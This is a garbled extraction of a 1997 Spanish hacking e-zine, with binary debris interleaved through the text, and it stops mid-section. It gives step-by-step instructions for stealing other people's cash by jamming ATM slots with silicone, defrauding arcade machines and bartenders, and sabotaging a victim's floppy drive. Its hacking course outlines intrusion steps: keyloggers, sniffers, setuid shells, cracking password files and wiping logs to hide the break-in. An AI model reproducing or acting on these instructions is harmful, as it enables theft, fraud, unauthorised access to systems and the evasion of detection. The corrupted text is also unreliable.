ALIPSO.COM - Trabajos prácticos, monografías, apuntes, tesis, manuales, material educativo y mucho más.

‰ÿÿÿÿ Vypl

»õÛ3Hack Navigator 1

[1]/HACK NAVIGATOR. Presente edicion por Diogenes.

BrowseButtons()/

;)[1]

z4|Ç¬7ÿNîÿÿ¦

|TTLBTREEp"|bm0Î26.]Qÿÿœ6]Qÿÿ¸¯ÿÿÿÿ
BÿÿÿÿN1[1]Ÿÿÿÿÿ!

N¡Hack Navigator #1S
¡6 <€<€
˜˜È€

†"€[1]‚€

€‚ÿNº 1 - agosto de 19972
NÓ& €€
ŒŒF€‚ÿContenido£¡és ´€G€‑ŒŒF€ãû6tà€‰€‚ãõ´•€‰€‚ãõŒn#€‰€‚ãÆ$*€‰€‚ãÌÒ©¼€‰€‚ãt·d²€‰€‚ÿTrucosCurso de HackingEncriptaciónEl privilegiado ROOTCómo crackear cualquier sistema basado en UnixPróximo Número de Hack Navigator†RÓo

4 6€¥[1]€
°ŒFã¾‹DW€‰€‚€ ‚ÿCreadores de Hack NavigatorTodos los contenidos de esta revista son solamente educativos, ninguno pretende incitar al crimen o a la ilegalidad. Cualquier uso erróneo de esta información no es responsabilidad nuestra. Así mismo, no nos hacemos responsables de las informaciones u opiniones de nuestros colaboradores o informadores.èšéW

N j€5€
ŒŒF€ƒƒƒ€
€‚ƒƒƒ€€ƒƒ€
€‚ƒƒƒƒƒ€
€‚ÿDisponible en:Iberhack:http://iberhack.islatortuga.comAxis:http://axis.guybrush.inf (Infovía)http://axis.guybrush.org (Internet)eo

æ* "€Ë[1]€
ŒŒFQ€‚ÿEsta revista se distribuye libremente. Te autorizamos a que tú también lo hagas siempre que no la modifiques, y el disclaimer; los miembros de las fuerzas y cuerpos de seguridad del Estado deben pagar 5.995 pts para poder leer la revista así como todos los funcionarios de cualquier estado reconocido por la ONU, empresa o asociación con ánimo de lucro.)

& €€
ŒŒF€‚ÿ@æO1[1]¢O~ïTrucos de Mikey/ ~& €€
°ŒF€
‚ÿTrucosÇOJ b€€
ŒŒF€‚ãâtoþ‰‚ãy°/Ñ‰‚ãõhë`‰‚ã"0

‰‚ãÙBÌ‰‚ÿBueno, bueno. Yo soy Mikey y voy a explicar algunos truquillos, que aprendí cuando estuve en un Internado.Cajero AutomáticoFutbolinesCabinas y máquinasTrapicheo al BarmanDisco bomba7
~Æ+ &€€‑°°Fû„€
€‚ÿBy Mikey)

ï& €€
ŒŒF€‚ÿBÆ11[1]¼!

[1]1kö
Cajero Automatico:ïk& €(€
°ŒF€
‚ÿCajero AutomáticoyO1ä* $€ž€
ŒŒF€‚€

‚ÿEste truco es la bomba y además idea mía ;)Vamos a necesitar lo siguiente:åk÷ . *€Ë€^ŒŒF¸J€ƒ‚ƒ‚ƒ‚ÿ* Un Tubo de Silicona (tamaño mediano, no os vayáis a llevar la pistola), cuesta unas 500 pelas* Un Cutter, mas conocido por cuchilla (por si hay alguien mas corto).* Y un destornillador, por si las moscas (plano y fino).¡[1]z[1]ä˜
' €õ

€
ŒŒF€‚ÿBueno, el truco es el siguiente : Vamos a un cajero que no esté en un punto conflictivo, es decir que no pase casi nadie. Vamos de noche y sacas dinero, 1.000 pelas o 2.000, lo mínimo, esto es solo para que la ranura por donde salen los billetes se abra, en ese momento echas las silicona kagando leches. Y ahora solo queda esperar a que el Señor Boniato, vaya al cajero a sacar viruta. El Señor Boniato, cuando esté esperando su dinero, se quedará con cara de tonto y pensando (Que cojones pasa?). Pues pasa, que en lugar de salir el dinero como normalmente saldría, los billetes se han quedado pegados a la silicona, y taponados.yQ÷
( ‑€£[1]€
ŒŒF€‚‚ÿEl señor Boniato lo intentará una vez mas, y otra, pero se irá a su casa desesperado para coger algo, mientras tanto vamos nosotros y con el cutter o destornillador sacamos la silicona, y esta saldrá con los billetitos calentitos del Señor Boniato. ;))Te puedes llevar de 2.000 pelas para arriba (en algunos lo mínimo son 2 talegos).®˜
¿
- (€

€
ŒŒF
Q€€‚ÿNota: Os puedo jurar que funciona, ya que lo hice con algunos kolegas en el internado y me llevé 10.000 pelas de porrazo ;)) 7

ö
+ &€€‑°°Fû„€
€‚ÿBy Mikey;
¿
11[1]

€

1dRBFutbolines3

ö
d& €€
°ŒF€
‚ÿFutbolines«[1]‚[1]1B) €€
ŒŒF€‚‚‚ÿEs muy fácil. Cuando insertes la moneda, tienes que tirar de una especie de gancho, pues bien, ahí es donde intervdBö
ienes, sin soltarlo lo dejas enganchado, con lo que tengas a mano (yo uso una moneda de 25 o 50 pero de las antiguas, haceros con una y la guardáis para estos casos).Echo esto, solo tienes que jugar y dejarte de preocupar por quien es el que tiene que invitar, ya que cada vez que se cuele una bola, esta vuelve a caer. Otro truquillo, pero este es una tontería es colocar cualquier cosa dentro de la portería, pero que no se vea, y así cuando metamos un gol, solo tenemos que coger la bola de la portería y jugar de nuevo.7
dRB+ &€€‑°°Fû„€
€‚ÿBy MikeyCB•B1[1]®
L†

•BÐBMJCabinas y Máquinas;RBÐB& €*€
°ŒF€
‚ÿCabinas y máquinasÚ²•BªC( ‑€e€
ŒŒF€
‚‚ÿA mi me ha funcionado con duros antiguos, si, de los grandes.La "cosa" está en coger y meter el duro en una ranurita que está en el hueco por donde se devuelven las monedas.4ÐBÞD- (€[1]€F€
‚‚‚‚‚‚‚‚‚ÿ------------------| --- --- || | | | | | -> Por aquí se meten las monedas normalmente.| --- --- || || --- --- || | | | | | -> Por aquí salen cuando le das a devolver.| --- --- |------------------jBªCHF( ‑€…[1]€
ŒŒF€
‚‚ÿPues en los huecos de abajo, si metéis el dedo doblado hacia arriba, palpareis unas especies de guías, es decir, dos plaquitas de metal, cuya distancia es casi la de un duro ( en realidad la obertura es mayor). Se trata de meter el duro antiguo entre esas 2 plaquitas.Antes de nada, probad a encontrar las 2 plaquitas.¥}ÞDíF( €ú€F€
‚‚‚‚‚ÿ-----------| || | -> Debéis palpar algo así dentro del hueco, ya sabéis, metéis el dedo y hacia arriba.| |-----------…YHFrG, (€²€
˜ŒF

€€‚ÿNota: El texto en negrita lo he sacado de Iberhack, por Cacique, Jaime Robles y Blakeä»íFVI) €w

€
ŒŒF€‚‚‚ÿPara lo siguiente necesitas un mechero eléctrico, (mejor los grandes, de estos de cocina)ya que son mas potentes. Coges un par de hilos de cobre y lo enganchas en la pistola en la parte de las chispas, y luego con los otros dos extremos los metes en las ranuras, le das al pulsador y dan partidas gratis o crédito. Puede que en algunas no funcione, puede deberse a que algunas tienen partes de plástico o que no has metido bien los hilos.À“rGJ- (€'€
ŒŒF
Q€€‚ÿNota: Gastarle el gas antes de hacerlo, ya sabes le metes un palillo en la boquilla y lo vacías. No vayas a quemar la cabina o los recreativos.7
VIMJ+ &€€‑°°Fû„€
€‚ÿBy MikeyDJ‘J1[1]5

€‰‘JÍJÑMTrapicheo al Barman<MJÍJ& €,€
°ŒF€
‚ÿTrapicheo al BarmanÍ[1]¥[1]‘JšM( ‑€K€
ŒŒF€‚‚ÿEste truco tiene que hacerse en discotecas, pubs, etc. vamos, lugares oscuros. Y con dos Barman.Va un colega tuyo a una discoteca, pub y le dais un billete de 5.000 por ejemplo, marcado con un número de teléfono, ejemplo: 405 555 012 ¡¡Pero que el Barman no lo vea !! Luego vas tú y te tomas algo, y le das un billete de 1.000 pelas o de 2.000, al segundo Barman. Cuando te dé la vuelta, le dices ¡¡Pero que es esto, si yo te he dado un billete de 5.000 pesetas !! Después de un rato, le dices: ¡¡hay fíjate me dieron un número de teléfono y lo apunté en el billete, míralo ya verás, es el 405 555 012. El Barman con cara de tonto te dará el billete y te dirá lo siento. 7
ÍJÑM+ &€€‑°°Fû„€
€‚ÿBy Mikey<
šM

N1[1]H

L†(

NANd‚Disco Bomba4
ÑMAN& €€
°ŒF€
‚ÿDisco bombap[1]G[1]

N½€) €

€
ŒŒF€‚‚‚ÿEsto es para putear a tu peor enemigo, se trata de joderle la disquetera, pero tranquilos no se trata de una disquetera que explota, sino de otra cosa, que paso a explicar a continuación.Hay dos maneras, que son las que a mí personalmente me gustan mas, la de lija y la grapa.Para la primera necesitamos un disquete y un trozo de lija lo mas fino que encontréis. Abrimos el disquete con sumo cuidado y dAN½€ÑMespegamos el algodoncillo blanco que tiene de protección y en su lugar colocamos la lija pero en trozitos muy pequeños, para que no se vean, los pegamos al disquete y ya está.
ãANÈ( ‑€Ç€
ŒŒF€‚‚ÿSolo nos queda pegar el disquete, para dejarlo como antes y dárselo a tu enemigo.El segundo tipo es lo mismo solo que en lugar de lija colocamos unas grapas en la banda magnética o dicho de otra manera, en el disco redondo.e9½€-‚, (€r€
ŒŒF
Q€€‚ÿNota: Esto esta basado en el texto de CyberHack de Cy7
Èd‚+ &€€‑°°Fû„€
€‚ÿBy MikeyA-‚¥‚1[1]Q

‰Ï

¥‚â‚[1]†Curso de Hacking=d‚â‚) "€(€
°ŒF€
€‚ÿCurso de Hacking‰[1][[1]¥‚k…. *€·

€
ŒŒF€‚€ €‚ÿLos que sepáis de qué va esto, no hace falta que lo leáis. Esto es para los que no tienen ni idea, o no saben qué hacer, la idea es promover el hacking en España que vamos un poquitín rezagados!Bueno, hackear algo es en términos literales liarse a hachazos, pero no en el sentido de destrozar algo, sino en el sentido de hacer que las cosas vayan de otras formas, estas formas a veces, son formas muy mal vistas, por eso se llaman hachazos (hacks) y por tanto, el autor es un hacker (llamarle hachador o leñador queda muy mal). Es como cuando no funciona la tele que le damos un golpe y cosas así.a-â‚Ì…4 8€Z€‑ŒŒFòã]7!€‰‚ã
²K‰‚ÿTerminologíaCómo entrar en un sistema6
k…[1]†+ &€€‑°°Fû„€
€‚ÿBy Homs=
Ì…?†1[1]ò(
[1]?†t†JTerminología5[1]†t†& €‑€
°ŒF€
‚ÿTerminología‡

?†ûŠ/ ,€±€
ŒŒF€‚€€‚‚ÿBueno ahí va algo de terminología para que no os perdáis :Boxes: no se utilizan mucho en hacking. pertenecen al phreaking. consisten en unos aparatos (circuitos eléctricos en su mayoría) que te permiten hacer cosas distintas con la línea telefónica, desde las ansiadas blue boxes y black boxes (llamadas gratuitas) hasta party-lines pasando por rastreadores de llamadas, emuladores de monedas para las cabinas, y un largo etc.Los pioneros de esto fueron los americanos en los 70 con las blue boxes. este tipo de caja (posiblemente el mas famoso) consiste en intercambiar unos tonos con la centralita durante el momento del establecimiento de la conexión. la idea es llamar a un teléfono que no genere coste (un tel. gratuito o un cobro revertido) y en un momento dado, enviamos la señal de colgar la línea, pero no la colgamos realmente, utilizamos la señal de supervisión de la línea correspondiente. lo que hacemos es colgar en una centralita pero no en la otra, y entonces llamamos al teléfono real mientras que nuestra centralita nos esta comunicando con un teléfono gratuito. es eso a grandes rasgos.#[1]ìt†‑7 <€Ù

€
ŒŒF€€‚€€ãæ‰‚ÿCrackear: esta palabra tiene tres acepciones. (bueno, yo al menos he oído esas tres acepciones). Un cracker es aquel que se dedica a romper las protecciones software (o a veces hardware como las mochilas, etc.) de los programas comerciales. pero también, un cracker es aquel que entra en un sistema solo para destrozarlo todo y tirarlo abajo. por ultimo, un cracker es un programa que trata de descifrar las passwords de las listas de usuarios de un servidor.Discador: ver wardialer.Ü

ûŠÁ- (€_€
ŒŒF€€€‚ÿFTP: es otro tipo de protocolo que se utiliza para realizar transferencias de archivos. cuando hacemos una conexión a un servidor por ftp estamos entrando en el servidor a través del puerto 21. Hay ftps de toda clase. tenéis por ahí algunos muy bonitos como el cuteftp que si se te corta un archivo a mitad de camino, luego sigues desde la mitad y sin problemas. Yo me baje un zip de 5mb en 8 trozos!!! el ftp se utiliza para muchas cosas. lo mas fácil es para entrar en un servidor y bajarte archivos de su red. luego, se puede utilizar para entrar en las maquinas de cierto tipo de usuarios. para que? pos mu fácil, para destrozarle el hdd. que yo sepa, no existen ftps que permitan hacer‑Á[1]† un format ya físicamente ES IMPOSIBLE formatear vía remota, lo que si se puede hacer es ejecutar un shell remoto y decirle que se autoformatee. También se le puede meter un virus x ahí, o simplemente dejarle un msg en el autoexec o lo que queráis!

Þ[1]‑
Ä* "€½€
ŒŒF€€‚ÿKeystroke: este programita normalmente es un TSR que intercepta la interrupción del teclado (es mejor desviar la irq, es mas complicado, pero merece la pena), y guardan todas las teclas pulsadas en un archivo de texto. este programa se deja instalado en el autoexec o algo así. entonces, viene un gordo, hace un login de root, y mete la password. entra, todo va normal y se pira. a los dos días, venimos nosotros, editamos el archivito y miramos y.....ohhhh! sorpresa. pone login :xxxx password : xxxxx ya lo tenemos. bueno, no es tan fácil. no pone login tal y password tal, solo pone las teclas pulsadas, pero también pone los enters! ósea, buscamos login+enter lo siguiente es el username y lo siguiente el password. fácil, no?)

ø[1]Á7Ç1 0€ñ€
ŒŒF€€‚€€‚ÿSniffer: es un monitor de la red. es decir, un programa que mira todos los paquetes que pasan por la red, de modo que se pueden interceptar logings con sus respectivas passwords. hay varios tipos de sniffers. se pueden hacer como scripts del telix, o bien se puede hacer poniendo tu máquina en modo promiscuo, pero eso seria muy peligroso, pues das mucho cantazo. Por ultimo, programas como el tcdump son sniffers desde cierto punto de vista.Sushi: set uid shell. también llamado huevo, es una técnica que consiste en hacer una copia del shell en otro directorio publico para que podamos entrar sin root, luego le asignamos como propietario el propio root y le decimos que ese shell se ejecute con los privilegios del propietario (en este caso el root).Þ[1][1]
ÄÊ1 0€[€
ŒŒF€€‚€€‚ÿTelnet: bueno, el telnet es un programa que visto desde fuera, parece un simple terminal anticuado y con poca potencia. el telnet es una potente herramienta si se sabe utilizar. hay sistemas en los que solo se puede entrar a través del telnet. es cuestión de cogerle la practica al telnet y probar todo lo que tiene (entrad por otros puertos, otras emulaciones, etc). en una conexión telnet, entramos al servidor por el puerto 23.Tcp wrapper: es una utilidad para facilitar el filtrado de datos, es utilizado por los roots para tener total completo sobre las máquinas conectadas a su sistema. Son muy potentes, así que si no sabéis lo que hacéis, no os pongáis a destrozar todo.à

7ÇõÎ+ $€k €
ŒŒF€€‚‚ÿWardialer: un wardialer, discador, scanner, es un programa que se encarga de llamar a muchos números de teléfono en busca de portadoras. llamar a muchos números a mano seria muy complicado, así que se deja el wardialer y el solito llama. estas portadoras están presentes en los modems, faxes, etc.El wardialer llama y espera contestación. Si contesta una persona cuelga directamente, y si contesta un módem, anota el numero de teléfono (algunos loguean también el tipo de portadora) y cuelga también. De este modo, tras unos 5000 números de búsqueda, tenemos xx números conectados a módems. Hay varios trucos para acelerar los escaneos. Por ejemplo, colgar muy pronto (al 2º o 3er ring). Buscar distritos telefónicos. Por ejemplo, imaginaros que queréis entrar en una universidad: buscáis su numero de teléfono y si empieza por 357, pues entonces es muy posible que también el módem empiece por 357. solo tenéis que buscar del 3570000 al 3579999. :-D esta técnica se ha hecho famosa debido a la película juegos de guerra, donde el protagonista hace un escaneo. Por eso se llama WARdialer o discador-war-games. Nunca hagáis hacking en números 900. Estos números localizan automáticamente las llamadas.éÊ* "€Ó€
ŒŒF€€‚ÿZapper: es un programa que se encarga de eliminar nuestra presencia de los logs tipo utmp y wtmp (estos logs no están en modo texto, y no podemos entrar con un simple editor). Se llaman zapper porque el mas famoso se llamabõÎ[1]†a zap.6
õÎJ+ &€€‑°°Fû„€
€‚ÿBy HomsJ”1[1]–Ï

”‡[1] ”ÖICómo entrar en un sistemaBJÖ& €8€
°ŒF€
‚ÿCómo entrar en un sistema›u”q& €ê€
ŒŒF€‚ÿBueno, cuando vayáis a entrar a un sistema, mis pasos a seguir (como los de cualquier hacker) son los siguientes :([1]þÖ™

* "€ý

€^ŒŒF¸J€ƒ‚ÿ1.Entrar en el sistema y conseguir el máximo de información posible. Sistema operativo, versión, sendmail, puertos de acceso, media de usuarios conectados. Una vez conseguida la máxima información posible, buscad los bugs mas comunes que puedan haber (en cualquier zine de hacking podréis ver bugs de sistemas operativos). también seria interesante que encontraseis otros servidores con datos comunes o con acceso a esa maquina, de forma que si se complica, podéis atacar al gordo desde la máquina pequeña.-

qÆ

) "€€^ŒŒF¸J€ƒ‚ÿ#ù™

* "€ó€^ŒŒF¸J€ƒ‚ÿ2.Conseguir acceso como root. Este paso es importante hacerlo deprisa y bien hecho. Da mucho el cante ver a un pavo entrando con 53.285 logins o buscando passwords a las 5 de la mañana. Hay muchísimas formas de entrar. Las principales son estas:)

& €€
ŒŒF€‚ÿ=[1][1]é

O* "€'

€‑ŒŒF€€‚‚ÿ- Aprovechar listas de usuarios/passwords. Aunque no lo parezca, muchas veces funciona debido a que un admin. torpe se ha dejado alguna cuenta activada.- Aprovechar fallos en los protocolos TCP/IP. Este protocolo es el mas estudiado, así que no os quedareis nunca sin información. Algunos Servicios que aprovechan este protocolo son el telnet, el ftp, el gopher, el sendmail, el http. Es difícil controlar todos los fallos de seguridad de todos estos servicios, así que siempre se encuentran fallos de seguridad en el web, etc.N

1 0€;€‑ŒŒF€€‚‚‚‚‚‚‚‚‚ÿ- Aprovechar los fallos de seguridad de UNIX. (en general)- Aprovechar los fallos de seguridad del sistema en el que tratamos de entrar.- Instalar un keystroke para conseguir password.- Colocar un sniffer.- Servicios de red tipo Network File System (NFS)/Netword Information Service (NIS)- Alterar el archivo .rhost (UNIX)- IP Spoofing o también utilizar UUCP- Recompilar las librerías del telnet para buscar fallos y entrar por ahí.- Conseguir el archivo de passwords y utilizar algún cracker para descifrarlas. Estos programas son el Jack, el John, el Crack de Unix, etc. Si el sistema utiliza passwords con shadow, la cosa se complica, tendréis que buscar el archivo donde están las claves-shadow. (si es ilegible, tendréis que usar un programa, lo podéis encontrar en muchos sitios)[1]ìO³
* "€Ù

€‑ŒŒF€€‚‚ÿ- Si las cosas se complican y queréis ser discretos, podéis utilizar un sniffer para buscar a un root. Cuando lo tengáis, logueadle durante una temporadita. Luego simplemente es hacer una clonación de IP y entrar como el. (mucho cuidado con esto. es completamente imposible que existan dos IP's iguales, así que tenéis que obligarle a utilizar otra).- Hay muchisímas formas de entrar. NO EXISTE NINGUN SISTEMA DONDE NO SE PUEDA ENTRAR. Así que es importante armarse de buenas referencias.)

Ü
& €€
ŒŒF€‚ÿ

³
g@* "€«€^ŒŒF¸J€ƒ‚ÿ3.Ocultarse en el sistema. Este es (para mi) el paso mas importante. Si no sabéis ocultar vuestras huellas, no sirve de nada entrar. Este paso es muy difícil, ya que hay sistemas en los que es literalmente IMPOSIBLE no dejar huellas. El problema principal son los logs. Los mas famosos son los utmp, los wtmp, los accountings (si esta activado, es imposible quitar todas las huellas), los syslogs, los desviados a un terminal/consola, etc. De todas formas, es difícil que un servidor tenga activado el accounting, ya que ocupa muchísimo en disco. utilizar un sushi es bastante cómodo, pero es muy fácil que te pille un administrador y si es listo, es posible que en lugar de quitártelo o cerrarte el acceso, te siga la pista y vea todo lo que haces. Y si estasÜ
g@J mucho tiempo en ese sistema, tal vez pueda hacerte alguna putada. yo casi nunca los uso.-

Ü
”@) "€€^ŒŒF¸J€ƒ‚ÿÚ®g@nB, &€]

€^ŒŒF¸J€ƒ‚ƒ‚ÿ4.Conseguir la información necesaria. Aquí es uno de los puntos donde entra la ética del hacker. Hay hackers que una vez que han llegado aquí se convierten en crackers y destrozan todo el sistema. Esta es la idea que comúnmente se tiene de un hacker, pero realmente, el hacker verdadero, lo único que destroza son los logs Y NADA MAS. Es interesante ver como cambia la idea que se tiene de un hacker a través de los tiempos.Ð¦”@>C* "€M€^ŒŒF¸J€ƒ‚ÿ5.Dejar el sistema como estaba y pirarse, esto es lo mas facilito. Pero si no habéis borrado bien las huellas de vuestra presencia, podéis pasar bastantes apuros.[1]ònBXE( ‑€å

€
ŒŒF€‚‚ÿQue no os de miedo entrar en un sistema. Hay millones de servidores en todo el mundo. No pasa nada si os cierran el acceso a un servidor por malos. Empezad por servidores flojitos (no los destrocéis, por favor, que sirvan como guía a los hackers nuevos), y poco a poco, iréis aprendiendo. Pero creedme, no vayáis de malos por ahí y limitaros a conseguir la información que queréis y punto. Será mejor para el servidor, mejor para vosotros y mejor para la imagen que se tiene de los hackers, ok?

ð[1]>CpH( ‑€á€
ŒŒF€‚‚ÿEn cuanto a un chat. mucho cuidado con lo que decís. Hay muchos listos que han caído por culpa de hablar mucho en un chat. Si queréis hacer cabronadas en un chat, adelante, pero eso no os da derecho a llamaros hackers. Si sabéis hacer un script, muy bien, felicidades, pero no sois hackers por eso. Si queréis mi opinión, mi script del mIRC solo lo uso para defenderme de los paletos que no paran de flodear.Por ultimo, un hacker tiene que conocer bien su máquina a nivel de hardware. Por eso es tan importante saber programar (os recomiendo pascal, c y sobretodo ASM), también la estructura de vuestro equipo (cpu, memoria, módem, s.o, etc.) y también es importante saber cómo funciona la red (los siete niveles ISO, protocolos, utilidades, etc.).vOXEæH' ‑€ž€
ŒŒF€‚‚ÿEso es todo, chavales. espero que esto os haya servido de algo. feliz hack!6
pHI+ &€€‑ŒŒFý„€
€‚ÿBy Homs=
æHYI1[1]6
[1]Aˆ[1]
YI˜IJEncriptación?I˜I& €2€
°ŒF€
‚ÿEncriptación (Por Taz)Ô‹YIlJI `€€
ŒŒFã
jœU€‰‚ã Þ‰‚ãm¼W‰‚ã:ÒX$‰‚ã©\¼W‰‚ÿRomper PGP usando todas las claves posiblesNSA crackear RSACrackear RSA públicamenteAsegurarLa mejor forma de crackear PGP1 ˜IJ( €€‑°°Fû„€
‚ÿBy Taz\+lJùJ1[1]Í ”‡[1]–

ùJQKƒRomper PGP usando todas las claves posiblesX/JQK) "€^€
°ŒF€
€‚ÿRomper PGP usando todas las claves posibles²

‹

ùJ

O' €€
ŒŒF€‚ÿLa mayoría de los usuarios no entiende el tamaño del problema. El esquema de encriptación IDEA requiere una clave de 128 bit. Cualquiera de 2^128 combinaciones posibles podrían ser legales como clave, y sólo esa única clave puede desencriptar con éxito todos los bloques de un mensaje. Supongamos que ha desarrollado un chip especial que puede probar un billón de claves por segundo (algo hoy en día muy lejos de la realidad). También decimos que puede permitirse usar un billón de tales chips para resolver el mismo problema al mismo tiempo. La tarea todavía requeriría más de 10.000.000.000.000 de años para probar todas las claves posibles de 128 bits. Todavía no conozco a nadie que haya durado mil veces la edad del universo que conocemos. Aunque la velocidad de los ordenadores sigue aumentando y los costes decrecen muy rápidamente, es casi probable que nunca IDEA pueda ser crackeado por F-brute.™[1]r[1]QK¨' €å

€
ŒŒF€‚ÿEl único tipo de ataque que podría tener éxito es uno que intenta resolver el problema desde el punto de vista matemático analizando las transformaciones que toman lugar entre bloques de texto puro y sus equivalen

O¨Jtes de texto cifrado. IDEA es un algoritmo bastante nuevo. Todavía tiene que trabajarse en términos de teoría de complejidad. Hasta ahora, parece que ningún algoritmo está mucho mejor preparado para resolver una cifra IDEA que el ataque de F-Brute, el cual es impracticable. la transformación no linear que tiene lugar en IDEA lo pone en una clase de problemas matemáticos extremadamente difíciles de resolver.´

O\ƒ' €

€
ŒŒF€‚ÿUna frase de paso en un password sin palabras formado por las primeras letras de las palabras en una frase fácilmente recordable, ejemplo 2b de "To be, or not to be". La gente utiliza esta aproximación a causa de métodos de crackeo de F-Brute, a menudo usados en ficheros de password encriptados con DES, que prueban todas las palabras en un diccionario y una lista de nombre propios comunes.1 ¨ƒ( €€‑°°Fû„€
‚ÿBy TazA\ƒÎƒ1[1]·Aˆ[1]à[1]

Îƒ„…NSA crackear RSA9ƒ„& €&€
°ŒF€
‚ÿNSA crackear RSAU.Îƒ\…' €][1]€
ŒŒF€‚ÿLa peña se preguntara si NSA fuera capaz de crackear RSA. La mejor defensa contra esta posibilidad es el hecho que el algoritmo para RSA es conocido mundialmente. Hoy en día no, cuando lea mensajes en Usenet diciendo que alguien les dijo que la NSA es capaz de romper PGP, pida documentación exacta.1 „…( €€‑°°Fû„€
‚ÿBy TazJ\…×…1[1]å–

×…†ÍŒCrackear RSA públicamenteB…†& €8€
°ŒF€
‚ÿCrackear RSA públicamente[1]e[1]×…¦ˆ( ‑€Ë

€
ŒŒF€‚‚ÿUn mensaje encriptado con RSA ha sido crackeado públicamente. Cuando los inventores de RSA publicaron por primera vez el algoritmo, encriptaron un mensaje de prueba y lo hicieron disponible con clave pública para encriptarlo. RSA ofreció 100 dólares a la primera persona que proporcionara el mensaje en texto puro. Este reto es a menudo llamado RSA-129, por la clave pública utilizada era e 129 dígitos, lo que se traduce aproximadamente a 430 bits.Recientemente, un equipo internacional factorizó con éxito la clave pública utilizada para encriptar el mensaje RSA-129 y recuperaron el mensaje puro que decía:P*†öˆ& €T€
°°F€      ‚ÿTHE MAGIC WORDS ARE SQUEAMISH OSSIFRAGEÜ[1]´[1]¦ˆÒ‹( ‑€i€
ŒŒF€‚‚ÿLos participante utilizaron el algoritmo de factorización más conocido en ese momento. Se han descubierto mejores métodos desde entonces, pero los resultados todavía son instructivos sobre la cantidad de trabajo requerida para crackear un mensaje encriptado.Los coordinadores han estimado que el proyecto tomó alrededor de 8 meses de tiempo real y usó aproximadamente 5.000 MIPS-años de tiempo de computación. Un MIPS-año es aproximadamente la cantidad de computación hecha por un ordenador de 1 MIPS (millones de instrucciones por segundo) en un año. La clave RSA-129 es aproximadamente igual en seguridad que una clave PGP de 426 bits, que ha sido demostrada como fácilmente crackeable.a5öˆ3Œ, (€j€
ŒŒF[1]Q€      €‚ÿPara más información en el proyecto RSA-129, vea:i7Ò‹œŒ2 4€n€
ŒŒFQ€ƒƒƒ€€‚ÿftp://ftp.ox.ac.uk/pub/math/rsa129/rsa129.ps.gz1      3ŒÍŒ( €€‑°°Fû„€
‚ÿBy Taz9œŒ1[1]

à[1]

€

7=ÀAsegurar1
ÍŒ7& €€
°ŒF€
‚ÿAsegurar&ø]Ž. *€ñ€
ŒŒF€€€‚‚ÿMucha peña utiliza la opción (-m) y esta opción no es nada segura, se puede vencer de muchas formas. La forma más fácil de saltarle la vielas a un fichero es TACHAN!!!Simplemente redireccionando la salida por pantalla a un fichero como sigue:N(7«Ž& €P€
˜˜F€‚ÿpgp nombre fichero > fichero en discoI]Ž
À- (€9[1]€
ŒŒF€€€‚ÿLa opción -m no esta hecha con la intención de ser una opción a prueba de fallos para evitar la generación de ficheros de texto puro, sino para servir simplemente como aviso para la persona que desencripta el fichero que no debería mantener una copia de texto puro en el sistema.«Ž
ÀÍŒ1 «Ž=À( €€‑°°Fû„€
‚ÿBy TazN
À‹À1[1]Ì

Nƒ

‹ÀÒÀmÄLa mejor forma de crakear PGPG!=ÀÒÀ& €B€
°ŒF€
‚ÿLa mejor forma de crackear PGPu[1]M[1]‹ÀGÃ( ‑€›

€
ŒŒF€‚‚ÿAhora mismo, el mejor ataque posible sobre PGP es un ataque de diccionario sobre la frase de paso. Este tipo de ataque es uno en el que un programa elige palabras de un diccionario y la a junta de diferentes maneras en un intento de adivinar su frase de paso.Este tipo de ataque en el que muchos programas de crackeo son muy sofisticados y pueden tomar ventaja de idiomas, frases populares y reglas gramaticales al construir sus intentos. Frases de una sola palabra, nombres propios (sobre todo famosos), citas famosas son casi siempre crackeables por programa mínimamente inteligente.õÎÒÀ<Ä' €€
ŒŒF€‚ÿIDEA es un algoritmo bastante nuevo. Todavía tiene que trabajarse en términos de teoría de crackeo de F-Brute, a menudo usados en ficheros de password encriptados con DES, que prueban todas las palabras.1 GÃmÄ( €€‑°°Fû„€
‚ÿBy TazE<Ä²Ä1[1]r €

[1]ˆ

²ÄóÄ4ÊEl privilegiado ROOTAmÄóÄ) "€0€
°ŒF€€
‚ÿEl privilegiado ROOTp[1]H[1]²ÄcÇ( ‑€‘

€
ŒŒF€‚‚ÿUna de las metas que debemos conseguir, una vez hallamos entrado en la maquina que vayamos ha hackear, es conseguir dominar la maquina como si fuésemos nosotros los administradores, ha esto se le llama (como ya sabéis) conseguir privilegios de root. Esto es vital para poder hacer algo interesante en la máquina, puesto que con una cuenta normal de usuario, los privilegios solo nos dan acceso a nuestro directorio de inicio.Hay varias técnicas para lograr ser root, pero yo explicare solamente unas cuantas y debéis ser vosotros los que tenéis que elegir el método mas apropiado.a[1]9[1]óÄÄÉ( ‑€s

€
ŒŒF€‚‚ÿAntes de nada, deciros que para ser un buen hacker lo mas fácil es empezar por aprender a usar el UNIX, con lo cual os aconsejo que os instaléis el Linux (es como el UNIX para PCs mas asequible) y que vayas probando, pero si no podéis instalaros el Linux deberíais aprender lo básico, buscando documentos por Inet, o comprándoos algún librillo, bueno cada cual que se las apañe como pueda.Esto pretende ser un texto para inicializados en este apasionante mundillo, por lo que si ya sabes un poco de Hack, te vas a aburrir un rato, (aunque siempre es bueno repasar).=cÇÊ- *€ €
ŒŒF€‚ãKD7‰‚ÿLos Shells3
ÄÉ4Ê( €€‑°°Fû„€
‚ÿBy AtilA;
ÊoÊ1[1]éNƒ

|ƒ

oÊ¦Ê=D[1]Los Shells7
4Ê¦Ê) "€€
°ŒF€
€‚ÿLos ShellsöÏoÊœË' €Ÿ€
ŒŒF€‚ÿEmpezaré por un método que es relativamente fácil de usar y que da buenos resultados. Los SHELLS son como el COMMAND.COM del MS-DOS y hay varios tipos de shells, dependiendo de la maquina en que estemos. Û¡¦ÊwÌ: B€C€‑ŒŒFò€€‚€€‚€€‚‚ÿcsh - C-Shell, permite usar el lenguaje c como comandosvsh - Casi nunca se encuentra, es como el Windows de DOS (+ o -)ksh- Korn Shell, otro masetc...l[1]6[1]œËãÎ6 :€m

€
ŒŒF€‚€€€€‚‚‚ÿTambién puede haber algún shell que se halla construido el Administrador lo cual supone una gran putada, porque puede ser muy raro.Los shells son programas que se ejecutan cuando entras en un sistema, lo cual reconoces porque aparece el símbolo $ como prompt (esto es lo mayoría, no siempre). Y cuando eres root tienes el prompt #.Entonces es aquí cuando empezamos a trabajar.... (je,je,je)Otro método para poder llegar a ser root seria crear una cuenta en el sistema pero este tiene que cumplir unos requisitos (que desgraciadamente no lo cumplen todos):[1]ÚwÌþ[1]5 8€µ

